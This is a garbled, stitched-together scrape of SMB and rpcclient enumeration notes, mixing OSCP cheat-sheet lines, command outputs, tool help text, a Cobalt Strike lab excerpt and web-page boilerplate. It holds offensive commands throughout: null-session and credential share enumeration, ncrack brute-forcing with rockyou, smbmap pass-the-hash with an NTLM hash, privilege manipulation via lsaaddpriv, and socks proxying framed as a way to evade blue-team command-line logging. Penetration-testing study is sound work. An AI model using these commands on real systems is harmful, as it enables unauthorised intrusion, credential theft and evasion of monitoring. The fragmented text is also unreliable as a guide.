When provided the username, it extracts information such as the username, Full name, Home Drive, Profile Path, Description, Logon Time, Logoff Time, Password set time, Password Change Frequency, RID, Groups, etc. This information includes the Group Name, Description, Attributes, and the number of members in that group. |_smb-vuln-ms10-061: false As with the lsaenumsid, it was possible to extract the SID but it was not possible to tell which user has that SID. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Shortcut to New Folder (2).lnk A 420 Sun Dec 13 05:24:51 2015 | Disclosure date: 2017-03-14 All rights reserved. | smb-enum-shares: A Little Guide to SMB Enumeration. You signed in with another tab or window. 1690825 blocks of size 2048. --------------- ---------------------- For this particular demonstration, we will first need a SID. OSCP notes: ACTIVE INFORMATION GATHERING Flashcards | Quizlet Next, we have two query-oriented commands. | Anonymous access: logonctrl Logon Control list List available commands on Replication READ ONLY This will use, as you point out, port 445. queryuseraliases Query user aliases --------------- ---------------------- --------- ---- ------- Most secure. ADMIN$ NO ACCESS --------------- ---------------------- result was NT_STATUS_NONE_MAPPED If proper privileges are assigned it also possible to delete a user using the rpcclient. queryaliasmem Query alias membership This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). dsenumdomtrusts Enumerate all trusted domains in an AD forest This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. Using rpcclient we can enumerate usernames on those OSs just like a windows OS. and therefore do not correspond to the rights assigned locally on the server. 2. lookupdomain Lookup Domain Name Learn. Adding it to the original post. If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host. On other systems, youll find services and applications using port 139. -U, --user=USERNAME Set the network username enumdata Enumerate printer data rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1011 Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. enumforms Enumerate forms getprinter Get printer info If used the RID is the parameter, the samlookuprids command can extract the username relevant to that particular RID. After enumerating groups, it is possible to extract details about a particular group from the list. This can be done by providing the Username and Password followed by the target IP address of the server. Use `proxychains + command" to use the socks proxy. ---- ----------- S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2) It is possible to target the group using the RID that was extracted while running the enumdomgroup. sourcedata Source data enumjobs Enumerate print jobs However, for this particular demonstration, we are using rpcclient. In there you may, many different batch, VBScript, and PowerShell, using some discovered credentials. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002 . *', # download everything recursively in the wwwroot share to /usr/share/smbmap. S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2) [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) smbclient (null session) enum4linux. MAC Address = 00-50-56-XX-XX-XX, [+] Finding open SMB ports. S-1-5-21-1835020781-2383529660-3657267081-1000 LEWISFAMILY\root (1) . It enumerates alias groups on the domain. Query Group Information and Group Membership. RID is a suffix of the long SID in a hexadecimal format. To begin the enumeration, a connection needs to be established. GENERAL OPTIONS netfileenum Enumerate open files The next command that can help with the enumeration is lsaquery. The TTL drops 1 each time it passes through a router. The ability to manipulate a user doesnt end with creating a user or changing the password of a user. The ability to interact with privileges doesnt end with the enumeration regarding the SID or privileges. Further, when the attacker used the same SID as a parameter for lsaenumprivaccount, they were able to enumerate the levels of privileges such as high, low, and attribute. timeout connecting to 192.168.182.36:445 ECHO Cracking Password. Another command to use is the enumdomusers. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi, if [ ! proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv. setprinterdata Set REG_SZ printer data rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 SPOOLSS This command is made from LSA Query Security Object. As from the previous commands, we saw that it is possible to create a user through rpcclient. Metasploit SMB auxiliary scanners. In the demonstration, the user with RID 0x1f4 was enumerated regarding their password properties. rpcclient $> lookupnames lewis If these kinds of features are not enabled on the domain, then it is possible to brute force the credentials on the domain. Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. none Force RPC pipe connections to have no special properties, Lets play with a few options: You get the idea, was pretty much the same for the Ubuntu guy cept that his user accounts were -3000. During our previous demonstrations, we were able to enumerate the permissions and privileges of users and groups based on the RID of that particular user. But it is also possible to get the password properties of individual users using the getusrdompwinfo command with the users RID. To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivielge to the SID and then used the lsadelpriv command to remove that privilege from that group as well. This command was able to enumerate two specific privileges such as SeChangeNotiftyPrivielge and SeNetworkLogonRight privilege. Sharename Type Comment First one - two Cobalt Strike sessions: Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing: {% code-tabs %} New Folder (9) D 0 Sun Dec 13 05:26:59 2015 What permissions must be assigned to the newly created files? lookupnames Convert names to SIDs Password Checking if you found with other enum . without the likes of: which most likely are monitored by the blue team. -P, --machine-pass Use stored machine account password is SMB over Ip. querydominfo Query domain info lsaenumsid Enumerate the LSA SIDS Enter WORKGROUP\root's password: It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether. getdriver Get print driver information rpcclient is a part of the Samba suite on Linux distributions. Wordlist dictionary. Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds. There are numerous tools and methods to perform enumeration, we will be finding different types of information on SMB throughout the article. .. D 0 Thu Sep 27 16:26:00 2018 Password attack (Brute-force) Brute-force service password. Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services. # download everything recursively in the wwwroot share to /usr/share/smbmap. can be cracked with, For passwordless login, add id_rsa.pub to target's authorized_keys, Add the extracted domain to /etc/hosts and dig again, rpcclient --user="" --command=enumprivs -N 10.10.10.10, rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np // get pipe names, smbclient -L //10.10.10.10 -N // No password (SMB Null session), crackmapexec smb 10.10.10.10 -u '' -p '' --shares, crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares, crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares, crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name, crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol, ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v, mount -t cifs "//10.1.1.1/share/" /mnt/wins, mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0. guest access disabled, uses encryption. [+] User SMB session establishd on [ip] Pentesting Cheatsheets. rpcclient $> queryuser msfadmin. The next command that can be used via rpcclient is querydominfo. All this can be observed in the usage of the lsaenumprivaccount command. It contains contents from other blogs for my quick reference, * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan), masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports, ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//'), nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A, (performs full scan instead of syn-scan to prevent getting flagged by firewalls), From Apache Version to finding Ubuntu version -> ubuntu httpd versions, : Private key that is used for login. [Update 2018-12-02] I just learned about smbmap, which is just great. --------- -------, Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-27 16:25 EDT smbmap -H [ip/hostname] will show what you can do with given credentials (or null session if no credentials). 631 - Internet Printing Protocol (IPP) 873 - Pentesting Rsync. After manipulating the Privileges on the different users and groups it is possible to enumerate the values of those specific privileges for a particular user using the lsalookupprivvalue command. [hostname] <20> - M 445/tcp open microsoft-ds [DATA] 1 tasks, 1 servers, 816 login tries (l:1/p:816), ~816 tries per task result was NT_STATUS_NONE_MAPPED With some input from the NetSecFocus group, Im building out an SMB enumeration check list here. 548 - Pentesting Apple Filing Protocol (AFP) 554,8554 - Pentesting RTSP. Heres an example Unix Samba 2.2.3a: Windows SMB is more complex than just a version, but looking in wireshark will give a bunch of information about the connection. share Disk This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository. In the previous demonstration, the attacker was able to provide and remove privileges to a group. | A buffer overflow vulnerability in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 enumdrivers Enumerate installed printer drivers RPC/SMB/NetBios exploiting tutorials : r/oscp - Reddit To explain how this fits in, let's look at the examples below: When an object is created within a domain, the number above (SID) will be combined with a RID to make a unique value used to represent the object. | \\[ip]\IPC$: D 0 Thu Sep 27 16:26:00 2018 rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2001 This is made from the words get domain password information. Common share names for windows targets are, You can try to connect to them by using the following command, # null session to connect to a windows share, # authenticated session to connect to a windows share (you will be prompted for a password), "[+] creating a null session is possible for, # no output if command goes through, thus assuming that a session was created, # echo error message (e.g. In the demonstration, it can be observed that lsaenumsid has enumerated 20 SIDs within the Local Security Authority or LSA. Pentesting Cheatsheets - Red Team Notes offensive security. How I Won 90 Days OSCP Lab Voucher for Free, https://github.com/s0wr0b1ndef/OSCP-note/, These notes are not in the context of any machines I had during the OSCP lab or exam. SMB2 Windows Vista SP1 and Windows 2008, nmap -n -v -Pn -p139,445 -sV 192.168.0.101, smbclient -L \\$ip --option='client min protocol=NT1', # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", # Will list all shares with available permissions, smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1, nmap --script smb-enum-shares -p 139,445 $ip, smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1', smbclient \\\\192.168.1.101\\admin$ -U t-skid, # Connect with valid username and password, smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '. [STATUS] 29.00 tries/min, 29 tries in 00:01h, 787 todo in 00:28h It is possible to perform enumeration regarding the privileges for a group or a user based on their SID as well. | grep -oP 'UnixSamba. This will attempt to connect to the share. Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). debuglevel Set debug level ENUMERATING USER ACCOUNTS ON LINUX AND OS X WITH RPCCLIENT, Hacking Samba on Ubuntu and Installing the Meterpreter. password: The group information helps the attacker to plan their way to the Administrator or elevated access. The article is focused on Red Teamers but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. lookupsids Convert SIDs to names *' # download everything recursively in the wwwroot share to /usr/share/smbmap. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000 The hash can then be cracked offline or used in an.